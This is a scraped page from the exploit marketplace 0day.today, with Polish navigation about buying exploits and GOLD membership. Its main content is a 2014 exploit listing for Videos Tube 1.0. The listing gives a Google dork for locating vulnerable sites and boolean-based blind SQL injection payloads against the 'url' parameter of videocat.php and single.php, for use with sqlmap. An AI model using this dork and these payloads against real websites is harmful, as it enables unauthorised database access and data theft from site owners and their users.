0day.today - Największa Baza Exploitów na Świecie.
![](/img/logo_green.jpg)
- Korzystamy z jednej głównej domeny: http://0day.today
- Większość materiałów jest kompletnie DARMOWA
- Jeżeli chcesz kupić exploita / zdobyć dostęp V.I.P lub zapłacić za którąś z usług,
musisz zakupić lub zdobyćGOLD
Administracja tej strony używa oficjalnej strony kontaktowej. Uważaj na oszustów!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Przeczytaj [ ugoda ]
- Przeczytaj [ Wyślij ] zasady
- Odwiedź [ faq ] strona
- [ Zarejestruj ] profil
- Zdobądź [ GOLD ]
- Jeżeli chcesz [ sprzedaj ]
- Jeżeli chcesz [ kup ]
- Jeżeli stracisz [ Konto ]
- Jakiekolwiek pytania [ [email protected] ]
- Strona autoryzacyjna
- Strona rejestracyjna
- Odzyskiwanie konta
- Strona FAQ
- Strona kontaktowa
- Zasady publikowania
- Strona
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Możesz się z nami skonaktować przez:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Videos Tube 1.0 - Multiple SQL Injection Vulnerabilities
Autor
Ryzyko
![](/img/risk/critlow_3.gif)
Wysokie Zagrożenie Bezpieczeństwa
]0day-ID
Kategoria
Data dodania
Platforma
# Exploit Title: Videos Tube SQL Injection and Remote Code Execution # Google Dork: inurl:"single.php?url=" video # Date: 05.05.2014 # Exploit Author: Mustafa ALTINKAYNAK # Vendor Homepage: http://www.phpscriptlerim.com # Software Link: http://demo.phpscriptlerim.com/free/videostube/ # Version: 1.0 Description (Açıklama) ======================== Category, showing video on the page are two types of SQL injection. Boolean-based blind and AND / OR time-based blind. Incoming data can be filtered off light. Vulnerability ======================== 1) videocat.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMAP Tool) 2) single.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMap Tool) # 0day.today [2024-07-15] #